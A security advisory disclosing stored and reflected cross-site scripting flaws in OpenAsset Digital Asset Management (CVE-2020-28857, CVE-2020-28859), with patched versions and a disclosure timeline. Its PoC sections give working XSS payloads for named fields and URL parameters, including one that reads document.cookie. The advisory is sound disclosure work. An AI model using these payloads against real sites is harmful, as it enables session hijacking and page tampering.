OpenAsset Digital Asset Management Cross Site Scripting

The OpenAsset Digital Asset Management web application suffers from multiple reflected and persistent cross site scripting vulnerabilities. Vulnerable versions include 12.0.19 (Cloud) and 11.2.1 (On-premise).


MD5 | 35b3d6bf27bfcacaa597e0ed89c5cc54

Title: Stored cross-site scripting (XSS)
Product: OpenAsset Digital Asset Management by OpenAsset
Vendor Homepage: https://www.openasset.com/
Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)
Fixed Version: 12.0.23 (Cloud) 11.4.10 (On-premise)
CVE Number: CVE-2020-28857

Author: Jack Misiura from The Missing Link
Website: https://www.themissinglink.com.au


Timeline:
2020-11-14 Disclosed to Vendor
2020-12-04 Vendor releases final patches
2020-12-10 Publication



1. Vulnerability Description

The OpenAsset Digital Asset Management web application allowed for stored cross-site scripting attacks against various parameters and endpoints. Vulnerable parts of the web application include:

* System Preferences

* Project Code regex field

* User name regex field

* Password regex field

* All three description fields

* First Album Name field

* Visit Items Per SOAP request field

* Categories description

* Keywords, triggered on deletion attempts

* Editing photographer name

* Access token name

* Web share name



2. PoC



For system preferences fields, the following payloads can be used:



" autofocus onfocus="alert('Stored XSS');" abc="

"><script>alert("Script stored XSS");</script>



For categories description:



Category Name Goes Here<script>alert('Description stored XSS');</script>



For keywords:



Delete Me<script>alert(1234);</script>



Photographer name:



John Smith<script>alert("XSS Attack!");</script>



Access token name:



TokenName"><script>alert("Stored XSS Tokens")</script>



Web share name:



Share<script>alert("Stored XSS Web Share Name");</script>



3. Solution



The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.



4. Advisory URL



https://www.themissinglink.com.au/security-advisories



--------

Title: Reflected cross-site scripting (XSS)
Product: OpenAsset Digital Asset Management by OpenAsset
Vendor Homepage: https://www.openasset.com/
Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)
Fixed Version: 12.0.22 (Cloud) 11.4.10 (On-premise)
CVE Number: CVE-2020-28859

Author: Jack Misiura from The Missing Link
Website: https://www.themissinglink.com.au

Timeline:
2020-11-14 Disclosed to Vendor
2020-12-04 Vendor releases final patches
2020-12-10 Publication


1. Vulnerability Description



Multiple reflected cross-site scripting (XSS) vulnerabilities in the OpenAsset Digital Asset Management software allows remote attackers to inject arbitrary JavaScript or HTML via:

* Account recovery/password reset page through the email parameter

* Saved search request, through the id parameter

* Search result request, through both the imageViewId and lpFilterInputId parameters



2. PoC



Account recovery:

https://example.com/Page/StartAccountRecovery?ok=1 <https://example.com/Page/StartAccountRecovery?ok=1&email=test%40test%3cscript%3ealert(document.cookie)%3c%2Fscript%3e.com> &email=test%40test<script>alert(document.cookie)<%2Fscript>.com



Saved search request:

https://example.com/AJAXPage/SavedSearch?id=167826 <https://example.com/AJAXPage/SavedSearch?id=167826%22')%3b%7d%3b%7d%5d%7d)%3b%3c/script%3e%3cscript%3ealert(%22Reflected%20XSS!%22)%3b%3c/script> "')%3b}%3b}]})%3b</script><script>alert("Reflected%20XSS!")%3b</script>

"');}}}]});alert(123);



Search result request:

https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript <https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript%3ealert(%22more+xss+here%22)%3b%3c/script> >alert("more+xss+here")%3b</script>



3. Solution



The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.



4. Advisory URL



https://www.themissinglink.com.au/security-advisories


Related Posts